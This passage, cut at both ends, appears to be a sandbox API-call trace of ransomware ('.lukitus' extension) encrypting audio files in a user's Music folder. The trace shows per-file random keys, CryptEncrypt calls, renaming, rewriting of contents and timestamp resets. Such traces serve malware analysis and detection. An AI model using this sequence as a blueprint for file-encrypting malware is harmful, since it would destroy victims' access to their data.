pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.578] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\PgYW nGFmTuPUNXUwq.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\pgyw ngfmtupunxuwq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.578] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\PgYW nGFmTuPUNXUwq.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\pgyw ngfmtupunxuwq.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-5239650A-9EFDEF59C32F.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-5239650a-9efdef59c32f.lukitus"), dwFlags=0x9) returned 1 [0108.580] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.580] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.585] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x84db, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x84db, lpOverlapped=0x0) returned 1 [0108.586] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.586] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x84db, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x84db, lpOverlapped=0x0) returned 1 [0108.586] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.586] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64be1350, dwHighDateTime=0x1d31760)) [0108.586] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.586] FlushFileBuffers (hFile=0x328) returned 1 [0108.589] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\qKMaBu0E4qs17fQHw.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\qkmabu0e4qs17fqhw.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c9940, ftCreationTime.dwHighDateTime=0x1d305a7, ftLastAccessTime.dwLowDateTime=0x9f213060, ftLastAccessTime.dwHighDateTime=0x1d3005c, ftLastWriteTime.dwLowDateTime=0x9f213060, ftLastWriteTime.dwHighDateTime=0x1d3005c, nFileSizeHigh=0x0, nFileSizeLow=0x17b14)) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.590] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\qKMaBu0E4qs17fQHw.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\qkmabu0e4qs17fqhw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.590] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\qKMaBu0E4qs17fQHw.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\qkmabu0e4qs17fqhw.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-6362E4F3-EAA74F3658B8.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-6362e4f3-eaa74f3658b8.lukitus"), dwFlags=0x9) returned 1 [0108.592] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.592] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.597] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x17b14, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x17b14, lpOverlapped=0x0) returned 1 [0108.598] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.598] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x17b14, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x17b14, lpOverlapped=0x0) returned 1 [0108.598] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.598] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64c074b0, dwHighDateTime=0x1d31760)) [0108.598] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.599] FlushFileBuffers (hFile=0x328) returned 1 [0108.602] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\rhjg7pMy.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\rhjg7pmy.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d58550, ftCreationTime.dwHighDateTime=0x1d2f6fd, ftLastAccessTime.dwLowDateTime=0x7f3a1510, ftLastAccessTime.dwHighDateTime=0x1d3037b, ftLastWriteTime.dwLowDateTime=0x7f3a1510, ftLastWriteTime.dwHighDateTime=0x1d3037b, nFileSizeHigh=0x0, nFileSizeLow=0x16a4)) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.602] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\rhjg7pMy.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\rhjg7pmy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.602] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\rhjg7pMy.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\rhjg7pmy.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-661EE13B-FDFC54F63D1B.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-661ee13b-fdfc54f63d1b.lukitus"), dwFlags=0x9) returned 1 [0108.604] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.604] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.609] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x16a4, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x16a4, lpOverlapped=0x0) returned 1 [0108.609] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.609] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x16a4, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x16a4, lpOverlapped=0x0) returned 1 [0108.609] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.610] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64c2d610, dwHighDateTime=0x1d31760)) [0108.610] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.610] FlushFileBuffers (hFile=0x328) returned 1 [0108.612] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\RpIimbK2wdoSlqmx.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\rpiimbk2wdoslqmx.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb910a40, ftCreationTime.dwHighDateTime=0x1d2ff35, ftLastAccessTime.dwLowDateTime=0x1d9263b0, ftLastAccessTime.dwHighDateTime=0x1d2f608, ftLastWriteTime.dwLowDateTime=0x1d9263b0, ftLastWriteTime.dwHighDateTime=0x1d2f608, nFileSizeHigh=0x0, nFileSizeLow=0x852)) returned 1 [0108.612] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.613] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\RpIimbK2wdoSlqmx.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\rpiimbk2wdoslqmx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.613] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\RpIimbK2wdoSlqmx.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\rpiimbk2wdoslqmx.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-BF55D3D8-FD0B023DC035.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-bf55d3d8-fd0b023dc035.lukitus"), dwFlags=0x9) returned 1 [0108.614] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.614] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.619] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x852, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x852, lpOverlapped=0x0) returned 1 [0108.620] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.620] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x852, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x852, lpOverlapped=0x0) returned 1 [0108.620] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.620] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64c53770, dwHighDateTime=0x1d31760)) [0108.620] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.620] FlushFileBuffers (hFile=0x328) returned 1 [0108.623] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\SSm4dCFGv.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ssm4dcfgv.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e37360, ftCreationTime.dwHighDateTime=0x1d2fc90, ftLastAccessTime.dwLowDateTime=0x983f3540, ftLastAccessTime.dwHighDateTime=0x1d2fa07, ftLastWriteTime.dwLowDateTime=0x983f3540, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0xb945)) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] CryptGenRandom (in: 